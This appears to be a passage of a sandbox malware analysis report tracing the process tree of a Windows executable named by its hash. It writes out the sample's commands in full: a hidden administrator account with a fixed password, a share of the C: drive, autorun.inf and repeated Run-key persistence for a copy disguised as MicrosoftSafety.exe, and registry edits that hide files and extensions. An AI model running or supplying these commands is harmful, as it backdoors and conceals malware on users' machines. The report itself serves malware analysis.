PID 1988 wrote to memory of 1640	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	48
PID 1988 wrote to memory of 1640	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	48
PID 1988 wrote to memory of 1640	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	48
PID 1988 wrote to memory of 1704	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	50
PID 1988 wrote to memory of 1704	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	50
PID 1988 wrote to memory of 1704	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	50
PID 1988 wrote to memory of 1704	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	50
PID 1516 wrote to memory of 1524	1516	net.exe	53
PID 1516 wrote to memory of 1524	1516	net.exe	53
PID 1516 wrote to memory of 1524	1516	net.exe	53
PID 1516 wrote to memory of 1524	1516	net.exe	53
PID 1988 wrote to memory of 1264	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	51
PID 1988 wrote to memory of 1264	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	51
PID 1988 wrote to memory of 1264	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	51
PID 1988 wrote to memory of 1264	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	51
PID 1988 wrote to memory of 908	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	54
PID 1988 wrote to memory of 908	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	54
PID 1988 wrote to memory of 908	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	54
PID 1988 wrote to memory of 908	1988	bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe	54

Views/modifies file attributes 1 TTPs 7 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
672	attrib.exe
884	attrib.exe
1796	attrib.exe
1816	attrib.exe
1320	attrib.exe
1488	attrib.exe
1288	attrib.exe

C:\Users\Admin\AppData\Local\Temp\bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe
"C:\Users\Admin\AppData\Local\Temp\bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe"
1⤵
- Drops autorun.inf file
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1988
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +H "C:\Users\Admin\AppData\Local\Temp\bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1744
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H "C:\Users\Admin\AppData\Local\Temp\bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1288
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /b /max .
  2⤵
  - Modifies registry class
  PID:1740
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c tskill taskmagr
  2⤵
  PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c cd C:\ & del *.lnk
  2⤵
  PID:848
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net share SYS_C$=C:\
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1732
- - C:\Windows\SysWOW64\net.exe
    net share SYS_C$=C:\
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1516
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 share SYS_C$=C:\
      4⤵
      PID:1524
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c MKDIR "C:\Program File"
  2⤵
  PID:660
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c COPY "C:\Users\Admin\AppData\Local\Temp\bbe7937b4c3198cbf46a8178753a63c987494d4f3a9798df65f8a57ce71f6941.exe" "C:\Program File\Microsoft\MicrosoftSafety.exe"
  2⤵
  PID:276
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c MKDIR "C:\Program File\Microsoft"
  2⤵
  PID:1324
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +H "C:\Program File"
  2⤵
  PID:1852
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H "C:\Program File"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:672
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +H "C:\Program File\Microsoft"
  2⤵
  PID:1640
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H "C:\Program File\Microsoft"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1816
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +H C:\C0MM
  2⤵
  PID:1704
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H C:\C0MM
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1796
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +H C:\C0MM\C0MM
  2⤵
  PID:1264
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H C:\C0MM\C0MM
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:884
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib -r -a C:\autorun.inf
  2⤵
  PID:908
- - C:\Windows\SysWOW64\attrib.exe
    attrib -r -a C:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:1320
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:1772
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1332
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CLASSES_ROOT\Network\SharingHandler" /v "" /t REG_SZ /d "" /f
  2⤵
  PID:1736
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CLASSES_ROOT\Network\SharingHandler" /v "" /t REG_SZ /d "" /f
    3⤵
    - Modifies registry class
    PID:1544
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net localgroup administrators /add SYS_4321
  2⤵
  PID:1636
- - C:\Windows\SysWOW64\net.exe
    net localgroup administrators /add SYS_4321
    3⤵
    PID:1628
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup administrators /add SYS_4321
      4⤵
      PID:1512
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v SYS_4321 /t REG_DWORD /d 0 /f
  2⤵
  PID:1032
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v SYS_4321 /t REG_DWORD /d 0 /f
    3⤵
    PID:1304
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net users SYS_4321 passPass
  2⤵
  PID:2000
- - C:\Windows\SysWOW64\net.exe
    net users SYS_4321 passPass
    3⤵
    PID:1100
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 users SYS_4321 passPass
      4⤵
      PID:276
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net users /add SYS_4321 passPass
  2⤵
  PID:1456
- - C:\Windows\SysWOW64\net.exe
    net users /add SYS_4321 passPass
    3⤵
    PID:1644
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 users /add SYS_4321 passPass
      4⤵
      PID:1164
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +h +r C:\autorun.inf
  2⤵
  PID:1928
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h +r C:\autorun.inf
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d " %homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1832
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d " C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:672
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1288
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:692
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf" /f
  2⤵
  PID:680
- - C:\Windows\SysWOW64\reg.exe
    reg DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf" /f
    3⤵
    PID:364
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v shutdownwithoutlogon /d 0 /t REG_DWORD /f
  2⤵
  PID:660
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v shutdownwithoutlogon /d 0 /t REG_DWORD /f
    3⤵
    PID:1796
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:1276
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:908
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:848
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1304
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1108
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1012
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1596
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1520
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:548
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1816
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:672
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1616
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1828
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1812
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:364
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1100
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:2000
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:2024
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1156
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1276
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1524
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1032
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1836
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1592
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:1012
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1264
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:860
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1620
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1236
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1640
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1544
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1824
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:1164
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1324
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:480
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1716
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1872
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1580
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2004
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:788
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:1488
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1748
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:976
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:548
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1252
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:904
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:1984
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1020
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1292
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1600
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:968
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:908
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1320
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1836
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:1744
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1520
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1596
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:604
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1108
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1824
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:848
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:692
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:1528
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1360
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:880
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:944
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1568
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:432
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1476
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:788
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:992
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
